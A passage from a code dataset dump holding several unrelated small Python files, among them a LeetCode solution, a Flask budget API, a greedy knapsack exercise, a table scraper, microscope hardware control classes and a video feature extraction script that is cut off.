List[int]:\n # solution: hashmap\n\n # ---\n n = len(nums)\n third = n / 3\n counts_dict = defaultdict(int)\n for num in nums:\n counts_dict[num] += 1\n\n # ---\n res = []\n for num, count in counts_dict.items():\n if count > third:\n res.append(num)\n return res\n \n","repo_name":"yukikongju/LeetCodeTraining","sub_path":"LeetCodePython/229-MajorityElementII-Hashmap.py","file_name":"229-MajorityElementII-Hashmap.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6669703575","text":"# 02. 「パトカー」+「タクシー」=「パタトクカシーー」\n# 「パトカー」+「タクシー」の文字を先頭から交互に連結して文字列「パタトクカシーー」を得よ.\n#\na = 'パトカー'\nb = 'タクシー'\na_len = len(a)\nb_len = len(b)\nab = []\n\nfor count in range(a_len):\n a_str = a[count]\n b_str = b[count]\n ab.append(a_str)\n ab.append(b_str)\n\nab =\"\".join(ab)\nprint (ab)\n","repo_name":"nagamine-404/nlp100","sub_path":"002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28132524934","text":"import time\r\nimport os\r\nfrom hashlib import md5\r\nfrom datetime import datetime\r\nfrom flask import Flask, request, session, url_for, redirect, render_template, abort, g, flash, _app_ctx_stack\r\nfrom flask_restful import Resource, Api\r\nfrom werkzeug import check_password_hash, generate_password_hash\t \r\nfrom flask_restful import reqparse, abort, Api, Resource\r\n\r\n\r\n# create our little application :)\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\napp.config.update(dict(SEND_FILE_MAX_AGE_DEFAULT=0))\r\n\r\nCATEGORIES = {\t }\r\nPURCHASE = {}\r\n#the next step is to change the todo into the user_ids, so that later only the user who created the room can delete it\r\n#need to somehow send the user's id via json to the js file\r\n\r\nSECRET_KEY = 'development key'\r\n\r\n\r\napp.config.from_object(__name__)\r\napp.config.from_envvar('MINITWIT_SETTINGS', silent=True)\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\n#db.init_app(app)\r\n\r\n\r\ndef abort_if_cat_doesnt_exist(cat_id):\r\n\tif cat_id not in CATEGORIES:\r\n\t\tabort(404, message=\"category {} doesn't exist\".format(cat_id))\r\n\r\ndef abort_if_pur_doesnt_exist(pur_id):\r\n\tif pur_id not in PURCHASE:\r\n\t\tabort(404, message=\"purchase {} doesn't exist\".format(pur_id))\r\n\t\t\r\n\t\t\r\nparser = reqparse.RequestParser()\r\nparser.add_argument('task')\r\n\r\n\r\n\r\nclass categories(Resource):\r\n\tdef get(self, cat_id):\t\t\t\t\t#definining one controller for each restful operations\r\n\t\tabort_if_cat_doesnt_exist(cat_id)\r\n\t\treturn CATEGORIES[cat_id]\r\n\r\n\tdef delete(self, cat_id):\r\n\t\tabort_if_cat_doesnt_exist(cat_id)\r\n\t\tdel CATEGORIES[cat_id]\r\n\t\treturn '', 204\r\n\r\n\tdef put(self, cat_id):\t\t\t\t\t\t#why is there a chatroomid here and the mothod still works \r\n\t\targs = parser.parse_args()\r\n\t\ttask = {'task': args['task']}\r\n\t\tCATEGORIES[cat_id] = task\r\n\t\treturn task, 201\r\n\r\n\r\n\r\nclass category_list(Resource):\r\n\tdef get(self):\r\n\t\treturn CATEGORIES\r\n\r\n\t#need to think more about the null case, the when the chatroom is null, the chatroom\t\r\n\tdef post(self):\r\n\t\targs = parser.parse_args()\r\n\t\tif CATEGORIES:\r\n\t\t\tcat_id = len(CATEGORIES)\r\n\t\t\t#cat_id = int(max(CATEGORIES.keys()).lstrip('category')) + 1\t\t\t#honestly, the id here is changeable, dones't really need to have the same name, think about how\r\n\t\t\t#cat_id = 'category%i' % cat_id\r\n\t\telse:\r\n\t\t\tcat_id = '0'#'category1' \t\t\t\t\t\t\t\t\t\t\t\t#for the empty array situation\t\t\t\r\n\t\t\r\n\t\tCATEGORIES[cat_id] = {'task': args['task']}\t\t\t\t#here is the place where you input the newmemssages, or just set message class as a list of strings?\r\n\t\treturn CATEGORIES[cat_id], 201\t\t#can specify the status code, like created, remove and ok\r\n\t\t\r\n###############################\t\t\r\nclass purchases(Resource):\r\n\tdef get(self, pur_id):\t\t\t\t\t#definining one controller for each restful operations\r\n\t\tabort_if_pur_doesnt_exist(pur_id)\r\n\t\treturn PURCHASE[pur_id]\r\n\r\n\tdef delete(self, pur_id):\r\n\t\tprint(\"pur_id is \",pur_id);\r\n\t\tabort_if_pur_doesnt_exist(pur_id)\r\n\t\tdel PURCHASE[pur_id]\r\n\t\treturn '', 204\r\n\r\n\tdef put(self, pur_id):\t\t\t\t\t\t#why is there a chatroomid here and the mothod still works \r\n\t\targs = parser.parse_args()\r\n\t\ttask = {'task': args['task']}\r\n\t\tPURCHASE[pur_id] = task\r\n\t\treturn task, 201\r\n\r\n\r\n\r\nclass purchase_list(Resource):\r\n\tdef get(self):\r\n\t\treturn PURCHASE\r\n\r\n\t#need to think more about the null case, the when the chatroom is null, the chatroom\t\r\n\tdef post(self):\r\n\t\targs = parser.parse_args()\t\t\t\t#just change the int into len or something\r\n\t\t\r\n\t\tif PURCHASE:\r\n\t\t\tpur_id = len(PURCHASE)#pur_id=int(max(PURCHASE.keys()).lstrip('purchase')) + 1\t\t\t#honestly, the id here is changeable, dones't really need to have the same name, think about how\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tpur_id = '0'\r\n\t\t\t\r\n\t\tPURCHASE[pur_id] = {'task': args['task']}\t\t\t\t#here is the place where you input the newmemssages, or just set message class as a list of strings?\r\n\t\treturn PURCHASE[pur_id], 201\t\t#can specify the status code, like created, remove and ok\r\n\t\t\r\n\r\n\r\n\r\n#might want to consider getting rid of the get_id methods, kind of useless here \t\r\n\r\n\r\n\r\ndef gravatar_url(email, size=80):\r\n\t\"\"\"Return the gravatar image for the given email address.\"\"\"\r\n\treturn 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \\\r\n\t\t(md5(email.strip().lower().encode('utf-8')).hexdigest(), size)\r\n\t\t\r\n\r\n@app.route('/')\r\ndef userInterface():\t\r\n\treturn render_template('userInterface.html' )\r\n\t\r\n\r\n\t\r\n\t\r\napp.jinja_env.filters['gravatar'] = gravatar_url\r\napi.add_resource(category_list, '/cats')\r\napi.add_resource(categories, '/cats/<cat_id>')\r\n\r\napi.add_resource(purchase_list, '/purchases')\r\napi.add_resource(purchases, '/purchases/<pur_id>')\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug=True)\r\n","repo_name":"SimonSaid1996/budget-app","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16446680644","text":"from typing import List\n\n\nclass Item(object):\n\n def __init__(self, n, v, w) -> None:\n self.name = n\n self.value = v\n self.weight = w\n\n def getValue(self):\n return self.value\n\n def getWeight(self):\n return self.weight\n\n def density(self):\n return self.getValue()/self.getWeight()\n\n def __str__(self):\n return f\"{self.name} : < {self.value}, {self.weight} >\"\n\n\ndef buildCollection(names, values, weight):\n menu = []\n for i in range(len(values)):\n menu.append(Item(names[i], values[i], weight[i]))\n\n return menu\n\n\ndef greedy(items, max_weight, key_function):\n \"\"\"Implementation of a flexible greedy algorithm\n (independent by the definition of best)\"\"\"\n # sort the items from best to worst according to the key_function (our definition of best)\n items_copy: List[Item] = sorted(items, key=key_function, reverse=True)\n result = []\n total_value, total_weight = 0, 0\n # ass items to the result until max_weight is reached\n for i in range(len(items_copy)):\n if (total_weight + items_copy[i].getWeight()) <= max_weight:\n result.append(items_copy[i])\n total_weight += items_copy[i].getWeight()\n total_value += items_copy[i].getValue()\n\n return (result, total_value)\n\n\ndef testGreedy(items, constraint, key_function):\n taken, val = greedy(items, constraint, key_function)\n print(f\"Total value of items takes = {val}\")\n for item in taken:\n print(item)\n\n\ndef testGreedys(foods, max_units):\n print(\"Use greedy by value to allocate\", max_units, 'Kg')\n testGreedy(foods, max_units, Item.getValue)\n print(\"\\nUse greedy by weight to allocate\", max_units, 'Kg')\n testGreedy(foods, max_units, lambda x: 1/Item.getWeight(x))\n print(\"\\nUse greedy by density to allocate\", max_units, 'Kg')\n testGreedy(foods, max_units, Item.density)\n\nif __name__ == \"__main__\":\n names = ['clock', 'picture', 'radio', 'vase',\n 'book', 'computer']\n values = [175, 90, 20, 50, 10, 200]\n weight = [10, 9, 4, 2, 1, 20]\n foods = buildCollection(names, values, weight)\n testGreedys(foods, 20)\n","repo_name":"kesler20/ossu","sub_path":"computer_science/introduction/MITx 6.00.2x/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22951802826","text":"import csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen('https://en.wikipedia.org/wiki/Comparison_of_text_editors')\nbsObj = BeautifulSoup(html,'html.parser')\ntable = bsObj.find_all('table',{'class':'wikitable'})[0]\nrows = table.find_all('tr')\n\ncsvFile = open('./editors.csv','wt',newline='',encoding='utf-8')\ntry:\n\twriter = csv.writer(csvFile)\n\tfor row in rows: #外层循环读取每行\n\t\tcsvRow = []\n\t\tfor cell in row.find_all(['td','th']): #内层循环读取一行中的每一个单元格\n\t\t\tcsvRow.append(cell.get_text())\n\t\twriter.writerow((csvRow))\nfinally:\n\tcsvFile.close()\n\t\n\t\n","repo_name":"StarStudyStart/WebSpiderSpace","sub_path":"Network_data/03CSVTest.py","file_name":"03CSVTest.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43400698539","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\n\nurlpatterns = [\n path('invite', views.invite),\n path('place-ships', views.placeShips),\n path('shoot', views.shoot),\n path('notify', views.notify),\n path('game-over', views.gameOver)\n]","repo_name":"khacduy221997/battle-ships","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38476831165","text":"import time\r\nimport os\r\nimport configparser\r\nfrom threading import Thread\r\nfrom Devices.AnalogDigitalOut import AnalogDigital_output_MCC, Digital_output, Analog_output\r\nfrom Devices.AnalogIn import AnalogInput\r\nfrom MNetwork.Connections import ClientObject\r\nimport ctypes\r\n\r\nimport numpy as np\r\n\r\ndef getNumberOfChannels(channel='Dev1/ai0:2'):\r\n if 'ai' in channel : chType = 'ai'\r\n else : chType = 'ao'\r\n try :\r\n upper = int(channel[channel.find(\":\") + 1:])\r\n lower = int(channel[channel.find(chType)+2:channel.find(\":\")])\r\n number_of_channels = upper - lower + 1\r\n except :\r\n number_of_channels = 1\r\n return number_of_channels\r\n\r\nclass NetworkDevice(object):\r\n def __init__(self, parent = None, deviceName = \"thorlabsdds220\", parentName = \"microscoper\",\r\n varName=\"networkDevice\", verbose=False):\r\n \"\"\"\r\n Creates a networked device.\r\n :param deviceName: Should be the same as deviceName in the server.ini file.\r\n :param parentName: Should be the same as the deviceName in the server.ini file.\r\n :param varName: Should be the same as the variable declared in the parent python file.\r\n \"\"\"\r\n\r\n self.parent = parent\r\n if not hasattr(self.parent,\"connection\"):\r\n raise Exception('parent must have connection attribute of class ClientObject')\r\n self.deviceName = deviceName\r\n self.parentName = parentName\r\n self.varName = varName\r\n self.verbose = verbose\r\n\r\n def sendCommand(self,command=\"moveAbs(25,1)\"):\r\n '''A command template'''\r\n self.parent.connection.sendConnectionMessage(f\"{self.deviceName}.{command}\")\r\n\r\n\r\n def sendQuery(self,query=\"currentPosition\",targetVar=\"delayStagePosition\"):\r\n '''A query template'''\r\n self.parent.connection.askForResponse(receiver=self.deviceName,\r\n sender=self.parentName,\r\n question=f\"{query}\",\r\n target=f\"{self.varName}.{targetVar}\",\r\n wait=True,\r\n verbose=self.verbose\r\n )\r\n\r\n ## if varName is device, this returns self.parent.device.delayStagePosition\r\n return getattr(eval(\"self.parent.{}\".format(self.varName)), targetVar)\r\n\r\n def getPos(self):\r\n return self.sendQuery()\r\n\r\n def move(self,absPosition = None, moveVel = None):\r\n self.sendCommand(\"moveAbs({},{})\".format(absPosition,moveVel))\r\n\r\n def moveToStartPosition(self):\r\n self.sendCommand(\"moveToStartPosition()\")\r\n\r\n def initScan(self, arg=\"continuous\"):\r\n self.sendCommand(f\"initScan(\\\"{arg}\\\")\")\r\n\r\n def startScan(self):\r\n self.sendCommand(\"startScan()\")\r\n\r\n def status(self):\r\n \"\"\" Returns True if the stage is not moving else False\r\n \"\"\"\r\n return not self.sendQuery(\"isMoving\",\"isMoving\")\r\n\r\n def stop(self):\r\n self.sendCommand(\"stop()\")\r\n\r\n\r\nclass MicroscopeDetector(object):\r\n def __init__(self, widgets=None, model=\"3101\"):\r\n ''' widget = array of PyQT widgets\r\n define slider widgets first before preset widgets'''\r\n self.PMT = AnalogDigital_output_MCC(boardNumber=0,model=model,name=\"PMT\")\r\n self.TPEF = 0\r\n self.SHG = 1\r\n self.CARS = 2\r\n self.Tr = 3\r\n\r\n # Define actions array\r\n self.setPMTsInitActions = []\r\n self.setPMTsSliderActions = []\r\n self.setPMTsZeroActions = []\r\n self.setPMTsPresetActions = []\r\n\r\n # Define widgets array\r\n self.labelWidgets = []\r\n self.sliderWidgets = []\r\n\r\n if widgets is not None: self.__setWidgets(widgets)\r\n\r\n self.setPMTsZero()\r\n\r\n def test(self):\r\n self.PMT.set_voltage(1,self.TPEF)\r\n self.PMT.set_voltage(1, self.SHG)\r\n self.PMT.set_voltage(1.0, self.CARS)\r\n\r\n def setPMTs(self):\r\n for action in self.setPMTsInitActions:\r\n action()\r\n print('Setting PMTs to voltage.')\r\n self.statusWidget.setText('PMT Status : On')\r\n\r\n def setPMTsZero(self):\r\n for action in self.setPMTsZeroActions:\r\n action(slider=False)\r\n # exec(action)\r\n self.statusWidget.setText('PMT Status : Off')\r\n\r\n def stop(self):\r\n self.PMT.set_voltage(0,self.TPEF)\r\n self.PMT.set_voltage(0, self.SHG)\r\n self.PMT.set_voltage(0, self.CARS)\r\n self.PMT.set_voltage(0, self.Tr)\r\n\r\n def __defValuePresetFunction(self,n,widget):\r\n value = widget.text()\r\n # value = eval(\"self.PresetWidget%s.text()\" % n)\r\n if 'zero' in value.lower(): value = 0\r\n value = int(value)\r\n def valuePresetFunction(execute=True,slider=True):\r\n if slider:\r\n try : self.sliderWidgets[n].setValue(value)\r\n except : print('No slider widget defined. Define slider widget first if available.')\r\n try : self.labelWidgets[n].setText(\"%i\"%(value))\r\n except : print('No text indicator widget defined. Define text widget first if available.')\r\n voltage = value/1000.\r\n if execute :\r\n self.PMT.set_voltage(voltage, int(n))\r\n return valuePresetFunction\r\n\r\n def __defSetPMTFunction(self,n,widget):\r\n def setPMTFunction(execute=False):\r\n value = widget.value()\r\n voltage = value/1000.\r\n self.labelWidgets[n].setText('%i'%(value))\r\n if execute :\r\n self.PMT.set_voltage(voltage, n)\r\n return setPMTFunction\r\n\r\n def __defInitPMTFunction(self,n,widget):\r\n def initPMTFunction(execute=True):\r\n value = widget.value()\r\n voltage = value/1000.\r\n if execute :\r\n self.PMT.set_voltage(voltage, n)\r\n return initPMTFunction\r\n\r\n\r\n def __hasNumbers(self,inputString):\r\n return any(char.isdigit() for char in inputString)\r\n\r\n def __getNumber(self,inputString):\r\n for char in inputString:\r\n if char.isdigit():\r\n return int(char)\r\n\r\n def __setWidgets(self,widgets):\r\n for widget in widgets:\r\n widgetName = widget.objectName().lower()\r\n if 'slider' in widgetName :\r\n if self.__hasNumbers(widgetName) :\r\n n = self.__getNumber(widgetName)\r\n self.sliderWidgets.append(widget)\r\n self.setPMTsSliderActions.append(self.__defSetPMTFunction(n,widget))\r\n self.setPMTsInitActions.append(self.__defInitPMTFunction(n,widget))\r\n if 'label' in widgetName :\r\n if self.__hasNumbers(widgetName) :\r\n n = self.__getNumber(widgetName)\r\n self.labelWidgets.append(widget)\r\n if 'zero' in widgetName :\r\n if self.__hasNumbers(widgetName) :\r\n n = self.__getNumber(widgetName)\r\n self.setPMTsZeroActions.append(self.__defValuePresetFunction(n,widget))\r\n if 'preset' in widgetName:\r\n if self.__hasNumbers(widgetName):\r\n n = self.__getNumber(widgetName)\r\n self.setPMTsPresetActions.append(self.__defValuePresetFunction(n,widget))\r\n if 'status' in widgetName:\r\n self.statusWidget = widget\r\n print('%s Stage widget connected.'%widget.objectName())\r\n\r\nclass MicroscopeShutter(object):\r\n def __makeFunctionChangeName(self,widget):\r\n originalText = widget.text()\r\n def newFunction(value=True):\r\n if value == True :\r\n widget.setText(originalText + ' is open')\r\n else :\r\n widget.setText(originalText + ' closed')\r\n return newFunction\r\n\r\n def __setWidgets(self,widgets):\r\n for widget in widgets:\r\n widgetName = widget.objectName().lower()\r\n if 'pump' in widgetName :\r\n self.pumpChangeText = self.__makeFunctionChangeName(widget)\r\n if self.Pump_shutter.get_digital_in() == 0:\r\n widget.setText(widget.text() + ' is open')\r\n self.pump = True\r\n else :\r\n widget.setText(widget.text() + ' closed')\r\n self.pump = False\r\n if 'stokes' in widgetName :\r\n # widget.setText(widget.text() + ' closed')\r\n # self.stokes = False\r\n self.stokesChangeText = self.__makeFunctionChangeName(widget)\r\n if self.Stokes_shutter.get_digital_in() == 0:\r\n widget.setText(widget.text() + ' is open')\r\n self.stokes = True\r\n else :\r\n widget.setText(widget.text() + ' closed')\r\n self.stokes = False\r\n\r\n def __init__(self,widgets=None):\r\n self.Stokes_shutter = AnalogDigital_output_MCC(model=\"3101\",name='Stokes shutter')\r\n self.Pump_shutter = AnalogDigital_output_MCC(model=\"3101\",name='Pump shutter')\r\n self.Microscope_shutter = Digital_output(\"Dev1/port0/line7\")\r\n self.Microscope_shutter_close()\r\n self.Pump_shutter_close()\r\n self.Stokes_shutter_close()\r\n\r\n if widgets is not None :\r\n self.__setWidgets(widgets)\r\n\r\n\r\n def Pump_shutter_close(self):\r\n print('Pump shutter close')\r\n self.Pump_shutter.set_digital_out(value=1,port=1)\r\n\r\n def Pump_shutter_open(self):\r\n print('Pump shutter open')\r\n self.Pump_shutter.set_digital_out(value=0,port=1)\r\n\r\n def Stokes_shutter_close(self):\r\n print('Stokes shutter close')\r\n self.Stokes_shutter.set_digital_out(1,port=2)\r\n\r\n def Stokes_shutter_open(self):\r\n print('Stokes shutter open')\r\n self.Stokes_shutter.set_digital_out(0,port=2)\r\n\r\n def Microscope_shutter_close(self):\r\n self.Microscope_shutter.write(np.array([255],dtype=np.uint8))\r\n # self.Microscope_shutter.close()\r\n\r\n def Microscope_shutter_open(self):\r\n self.Microscope_shutter.write(np.array([0],dtype=np.uint8))\r\n # self.Microscope_shutter.close()\r\n\r\n def Set_PumpShutter(self):\r\n self.pump = not self.pump\r\n if self.pump :\r\n self.Pump_shutter_open()\r\n else :\r\n self.Pump_shutter_close()\r\n try :\r\n self.pumpChangeText(self.pump)\r\n except :\r\n pass\r\n\r\n\r\n def Set_StokesShutter(self):\r\n self.stokes = not self.stokes\r\n if self.stokes :\r\n self.Stokes_shutter_open()\r\n else :\r\n self.Stokes_shutter_close()\r\n try :\r\n self.stokesChangeText(self.stokes)\r\n except :\r\n pass\r\n\r\n\r\nclass Microscope(object):\r\n mainPath = os.path.dirname(os.path.realpath(__file__))\r\n ini_file = mainPath + '/Microscoper_app.ini'\r\n acquiring = False\r\n settings = None\r\n extensionApps = None\r\n devices = None\r\n\r\n def __init__(self):\r\n self.defineDefaultSettings()\r\n\r\n def __checkExists(self):\r\n if os.name == \"nt\":\r\n handle = ctypes.windll.user32.FindWindowW(None, \"Microscoper 2017\") # Checks if the app is already running\r\n if handle != 0:\r\n ctypes.windll.user32.ShowWindow(handle, 10) # If the app exists, move window to top\r\n exit(0) # Close the python program\r\n\r\n def maximizeWindows(self):\r\n handles = []\r\n if os.name == \"nt\":\r\n for appWindowName in self.extensionApps:\r\n handle = ctypes.windll.user32.FindWindowW(None, appWindowName)\r\n ctypes.windll.user32.ShowWindow(handle, 10)\r\n\r\n def defineDefaultSettings(self):\r\n self.settings = {\r\n \"filename\": \"Microscoper\",\r\n \"directory\": \"C:/Users/Jeremy/Desktop/Microscoper\",\r\n \"device buffer\": \"8192\",\r\n \"max scan amplitude\": \"16\",\r\n \"input channels\": \"Dev1/ai0:3\",\r\n \"output channels\": \"Dev1/ao0:1\",\r\n \"resolution\": \"32\",\r\n \"zoom\": \"1\",\r\n \"dwell time\": \"1\",\r\n \"fill fraction\": \"1\",\r\n \"delay start position\": \"0\",\r\n \"delay end position\": \"10\",\r\n \"delay increments\": \"0.050\",\r\n \"focus start position\": \"0\",\r\n \"focus end position\": \"20\",\r\n \"focus increments\": \"0.48\",\r\n \"delay preset1\": \"0\",\r\n \"delay preset2\": \"80\",\r\n \"delay preset3\": \"150\",\r\n \"stage x target\": \"0\",\r\n \"stage y target\": \"0\",\r\n \"stage z target\": \"0\",\r\n \"stage x current\": \"0\",\r\n \"stage y current\": \"0\",\r\n \"stage z current\": \"0\",\r\n \"frames to average\": \"1\",\r\n \"connection port\": \"10230\",\r\n \"scan x offset\": \"0\",\r\n \"scan y offset\": \"0\",\r\n }\r\n\r\n for i in range(0, getNumberOfChannels(self.settings[\"input channels\"])):\r\n self.settings[\"PMT %i\" % i] = \"0\"\r\n self.settings[\"Image Maximums %i\" % i] = \"1000\"\r\n self.settings[\"Image Minimums %i\" % i] = \"0\"\r\n\r\n self.deviceList = {\r\n \"linearstage\" : \"odl220\",\r\n }\r\n\r\n def loadConfig(self):\r\n\r\n config = configparser.ConfigParser()\r\n\r\n def make_default_ini():\r\n self.defineDefaultSettings()\r\n config[\"Settings\"] = {}\r\n for key, value in self.settings.items():\r\n config['Settings'][str(key)] = str(value)\r\n config[\"Devices\"] = {}\r\n for key, value in self.deviceList.items():\r\n config[\"Devices\"][str(key)] = str(value)\r\n\r\n with open(self.ini_file, 'w') as configfile:\r\n config.write(configfile)\r\n\r\n def read_ini():\r\n self.defineDefaultSettings()\r\n config.read(self.ini_file)\r\n configSettings = list(config.items(\"Settings\"))\r\n\r\n for key, value in configSettings:\r\n self.settings[key] = value\r\n\r\n self.imageMaximums = []\r\n self.imageMinimums = []\r\n for i in range(0,getNumberOfChannels(self.settings[\"input channels\"])):\r\n max = float(config['Settings']['Image Maximums %i' % i])\r\n min = float(config['Settings']['Image Minimums %i' % i])\r\n if max == min:\r\n max += 1\r\n self.imageMaximums.append(max)\r\n self.imageMinimums.append(min)\r\n\r\n devices = list(config.items(\"Devices\"))\r\n\r\n for key, value in devices:\r\n self.deviceList[key] = value\r\n\r\n try:\r\n read_ini()\r\n except:\r\n make_default_ini()\r\n read_ini()\r\n\r\n\r\n def saveConfig(self):\r\n config = configparser.ConfigParser()\r\n config[\"Settings\"] = {}\r\n config[\"Extension apps\"] = {}\r\n config[\"Devices\"] = {}\r\n for key, value in self.settings.items():\r\n config['Settings'][str(key)] = str(value)\r\n for key, value in self.deviceList.items():\r\n config['Devices'][str(key)] = str(value)\r\n with open(self.ini_file, 'w') as configfile:\r\n config.write(configfile)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import time\r\n s = MicroscopeShutter()\r\n # s.Pump_shutter_open()\r\n s.Stokes_shutter_open()\r\n time.sleep(1)\r\n # s.Pump_shutter_close()\r\n s.Stokes_shutter_close()\r\n # s.Microscope_shutter_close()\r\n # s.Stokes_shutter_open()","repo_name":"JeremyPorquez/MicroscoperPython","sub_path":"microscoper/MicroscoperComponents.py","file_name":"MicroscoperComponents.py","file_ext":"py","file_size_in_byte":15735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"792056180","text":"import argparse, os\nimport h5py\nfrom scipy.misc import imresize\nimport skvideo.io\nfrom PIL import Image\nimport json\n\nimport torch\nfrom torch import nn\nimport torchvision\nimport random\nimport numpy as np\n\nfrom models import resnext\nfrom tqdm import tqdm\n\n\ndef load_file_paths(args):\n ''' Load a list of (path,image_id tuples).'''\n file_paths = list()\n with open(args.annotation_file, 'r', encoding='utf-8') as anno_file:\n instances = json.load(anno_file)\n video_ids = [instance['video_id'] for instance in instances['videos']]\n video_ids = set(video_ids)\n for vid in video_ids:\n if args.feature_type in ['appearance', 'motion']:\n file_paths.append((args.dataset_dir + 'video/{}.avi'.format(vid), vid))\n elif args.feature_type == 'hand':\n file_paths.append((args.dataset_dir + 'hand/{}hand.avi'.format(vid), vid))\n else:\n file_paths.append((args.dataset_dir + 'audio/{}.wav'.format(vid), vid))\n\n return file_paths\n\ndef build_resnet():\n if not hasattr(torchvision.models, args.model):\n raise ValueError('Invalid model \"%s\"' % args.model)\n if not 'resnet' in args.model:\n raise ValueError('Feature extraction only supports ResNets')\n cnn = getattr(torchvision.models, args.model)(pretrained=True)\n model = torch.nn.Sequential(*list(cnn.children())[:-1])\n model.cuda()\n model.eval()\n return model\n\n\ndef build_resnext():\n model = resnext.resnet101(num_classes=400, shortcut_type='B', cardinality=32,\n sample_size=112, sample_duration=16,\n last_fc=False)\n model = model.cuda()\n model = nn.DataParallel(model, device_ids=None)\n assert os.path.exists('preprocess/pretrained/resnext-101-kinetics.pth')\n model_data = torch.load('preprocess/pretrained/resnext-101-kinetics.pth', map_location='cpu')\n model.load_state_dict(model_data['state_dict'])\n model.eval()\n return model\n\n\ndef run_batch(cur_batch, model):\n \"\"\"\n Args:\n cur_batch: treat a video as a batch of images\n model: ResNet model for feature extraction\n Returns:\n ResNet extracted feature.\n \"\"\"\n mean = np.array([0.485, 0.456, 0.406]).reshape(1, 3, 1, 1)\n std = np.array([0.229, 0.224, 0.224]).reshape(1, 3, 1, 1)\n\n image_batch = np.concatenate(cur_batch, 0).astype(np.float32)\n image_batch = (image_batch / 255.0 - mean) / std\n image_batch = torch.FloatTensor(image_batch).cuda()\n with torch.no_grad():\n image_batch = torch.autograd.Variable(image_batch)\n\n feats = model(image_batch)\n feats = feats.data.cpu().clone().numpy()\n\n return feats\n\n\ndef extract_clips_with_consecutive_frames(path, num_clips, num_frames_per_clip):\n \"\"\"\n Args:\n path: path of a video\n num_clips: expected numbers of splitted clips\n num_frames_per_clip: number of frames in a single clip, pretrained model only supports 16 frames\n Returns:\n A list of raw features of clips.\n \"\"\"\n valid = True\n clips = list()\n try:\n video_data = skvideo.io.vread(path)\n except:\n print('file {} error'.format(path))\n valid = False\n if args.model == 'resnext101':\n return list(np.zeros(shape=(num_clips, 3, num_frames_per_clip, 112, 112))), valid\n else:\n return list(np.zeros(shape=(num_clips, num_frames_per_clip, 3, 224, 224))), valid\n total_frames = video_data.shape[0]\n img_size = (args.image_height, args.image_width)\n for i in np.linspace(0, total_frames, num_clips + 2, dtype=np.int32)[1:num_clips + 1]:\n clip_start = int(i) - int(num_frames_per_clip / 2)\n clip_end = int(i) + int(num_frames_per_clip / 2)\n if clip_start < 0:\n clip_start = 0\n if clip_end > total_frames:\n clip_end = total_frames - 1\n clip = video_data[clip_start:clip_end]\n if clip_start == 0:\n shortage = num_frames_per_clip - (clip_end - clip_start)\n added_frames = []\n for _ in range(shortage):\n added_frames.append(np.expand_dims(video_data[clip_start], axis=0))\n if len(added_frames) > 0:\n added_frames = np.concatenate(added_frames, axis=0)\n clip = np.concatenate((added_frames, clip), axis=0)\n if clip_end == (total_frames - 1):\n shortage = num_frames_per_clip - (clip_end - clip_start)\n added_frames = []\n for _ in range(shortage):\n added_frames.append(np.expand_dims(video_data[clip_end], axis=0))\n if len(added_frames) > 0:\n added_frames = np.concatenate(added_frames, axis=0)\n clip = np.concatenate((clip, added_frames), axis=0)\n new_clip = []\n for j in range(num_frames_per_clip):\n frame_data = clip[j]\n img = Image.fromarray(frame_data)\n img = imresize(img, img_size, interp='bicubic')\n img = img.transpose(2, 0, 1)[None]\n frame_data = np.array(img)\n new_clip.append(frame_data)\n new_clip = np.asarray(new_clip) # (num_frames, channels, width, height)\n if args.model in ['resnext101']:\n new_clip = np.squeeze(new_clip)\n new_clip = np.transpose(new_clip, axes=(1, 0, 2, 3))\n clips.append(new_clip)\n return clips, valid\n\n\ndef extract_feature(model, files_path, num_clips, outfile):\n \"\"\"\n Args:\n model: loaded pretrained model for feature extraction\n files_path: list of files path\n num_clips: expected numbers of splitted clips\n outfile: path of output file to be written\n Returns:\n h5 file containing visual features of splitted clips.\n \"\"\"\n if not os.path.exists('data/{}'.format(args.dataset)):\n os.makedirs('data/{}'.format(args.dataset))\n\n dataset_size = len(files_path)\n\n with h5py.File(outfile, 'w') as fd:\n feat_dset = None\n file_ids_dset = None\n i0 = 0\n for i, (file_path, file_id) in enumerate(tqdm(files_path)):\n if args.feature_type == 'audio':\n try:\n feat = model.forward(file_path)\n except:\n feat = torch.zeros(8, 128)\n if feat_dset is None:\n (C, D) = (8, 128)\n feat_dset = fd.create_dataset('VGG_features', (dataset_size, C, D),\n dtype=np.float32)\n file_ids_dset = fd.create_dataset('ids', shape=(dataset_size,), dtype=int)\n\n i1 = i0 + 1\n if feat.size(0) != C:\n if len(feat.shape) == 1:\n feat = torch.unsqueeze(feat, dim=0)\n sample_list = np.linspace(0, feat.size(0) - 1, C, dtype=int)\n feat_dset[i0:i1] = feat.cpu().detach().numpy()[sample_list]\n else:\n feat_dset[i0:i1] = feat.cpu().detach().numpy()\n file_ids_dset[i0:i1] = int(file_id[2:])\n i0 = i1\n\n else:\n clips, valid = extract_clips_with_consecutive_frames(file_path, num_clips=num_clips,\n num_frames_per_clip=16)\n if args.feature_type == 'appearance':\n clip_feat = list()\n if 